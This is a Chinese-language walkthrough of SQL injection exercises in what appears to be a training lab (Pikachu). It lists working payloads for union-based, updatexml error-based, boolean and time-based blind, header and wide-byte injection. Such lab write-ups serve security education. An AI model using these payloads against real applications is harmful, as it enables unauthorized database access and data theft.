数字型注入(post)
首先选择一个提交看看效果,并且抓包分析查看用什么方式进行提交
通过burp很清晰看出使用的是post提交,我们发送到repeater
尝试寻找注入
使用 1 or 1=1 看到返回了所有用户
接下来就可以使用order by进行查找,通过查找有2列
那么就配合union进行查询
得到数据库名,后续就简单了,不做演示
字符型注入(get)
我们输入1 提交,使用hackbar进行注入比较方便
尝试语句:1 or 1=1 发现还是没效果,那么尝试加上单引号:1' or 1=1,此时发现报了sql语句错误,加上注释就得到了所有用户,说明使用的是单引号进行闭合
payload:1' or 1=1 -- -
获取数据库
payload:-1' union select database(),2 -- -
搜索型注入
可以看到这题的payload和上一题一样
通过order by知道有3列,使用union获得数据库名
payload:1' union select database(),2,3 -- -
xx型注入
通过payload尝试,发现是')闭合方式
payload:1') or 1=1 -- -
payload:1') union select database(),2 -- -
insert/update注入
点击注册页面,分析大概sql语句写法构造payload
分析:
自己平时写新增的sql语句大概样子
insert into 表名(字段1,字段2,字段3) values('值1','值2','值3')
将这个sql语句报错
insert into 表名(字段1,字段2,字段3) values('值1''**or updatexml(1, concat(0x7e, database(), 0x7e), 1) or'**,'值2','值3')
payload:'and updatexml(1, concat(0x7e, database(), 0x7e), 1) and'
登录进去点击修改信息,这是是更新的sql注入
使用的payload与上面一样
delete注入
输入一些内容点击提交,然后删除留言,使用burp进行抓取,抓取到的数据包发送到repeater
看到get请求删除,我们在这里进行注入
payload:or updatexml(1, concat(0x7e, database(), 0x7e), 1)
中间有的空格需要用+连接
http header注入
通过提示,登录账号
可以看到这里有两个头,我们使用burp抓包进行修改,不管修改的是User-Agent还是Accept都可以
payload:1 'or updatexml(1, concat(0x7e, database(), 0x7e), 1) or'
布尔盲注
输入已知的用户名,尝试闭合
payload:lucy' and 1=1 -- -
当payload:lucy' and 1=2 发现报错,说明可以进行盲注
尝试出数据库长度
payload:lucy' and length(database())=7 -- -
时间盲注
输入正确用户名以及闭合的提示都是只有一个,那么我们试试时间盲注
payload:lucy' and sleep(3) -- -
发现浏览器加载3s后才成功跳转,说明这里是时间盲注
判断数据库长度
payload:lucy' and if(length(database())=7,sleep(3),1) -- -
盲注可以使用sqlmap或者自己写一些脚本工具减少自己的工作量
宽字节注入
输入lucy进行抓包
进行宽字节注入
payload:lucy%df'+or+1=1--+
